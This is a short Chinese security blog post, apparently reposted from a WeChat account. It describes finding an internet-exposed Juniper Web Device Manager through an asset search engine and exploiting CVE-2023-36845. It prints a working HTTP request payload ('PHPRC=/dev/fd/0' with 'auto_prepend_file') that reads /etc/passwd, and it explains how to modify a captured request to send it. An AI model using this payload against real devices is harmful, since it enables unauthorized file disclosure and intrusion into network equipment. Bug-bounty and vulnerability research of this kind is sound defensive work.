记src一处Juniper远程命令执行

admin 2023年10月27日01:32:27评论28 views字数 715阅读2分23秒阅读模式
                     

扫码领资料

获网安教程

免费&进群

记src一处Juniper远程命令执行

记src一处Juniper远程命令执行

本文由 - sbhglqy 稿

一、hunter搜索web.title=”Juniper Web Device Manager”,查找到香港的一处资产。

记src一处Juniper远程命令执行

二、访问相关网页,界面就是Juniper登录界面。

记src一处Juniper远程命令执行

三、根据编号为CVE-2023-36845的利用方法,抓包,修改提交方式,成功读取到文件。

原始包如下:
记src一处Juniper远程命令执行
payload如下:

  1. POST /?PHPRC=/dev/fd/0 HTTP/1.1

  2. Host: {{Hostname}}

  3. Content-Type: application/x-www-form-urlencoded

  4. auto_prepend_file="/etc/passwd"

修改传参方式,并按照上述payload在路径后面拼接上”?PHPRC=/dev/fd/0”,请求体中加入auto_prepend_file参数。结果如下:
记src一处Juniper远程命令执行


.

记src一处Juniper远程命令执行

~


+++

 

记src一处Juniper远程命令执行

 


Xray


cs4.0使

 | CNVD

SRC++

     | IP

记src一处Juniper远程命令执行

+~~ 


原文始发于微信公众号(掌控安全EDU):记src一处Juniper远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月27日01:32:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记src一处Juniper远程命令执行https://cn-sec.com/archives/2149145.html

发表评论

匿名网友 填写信息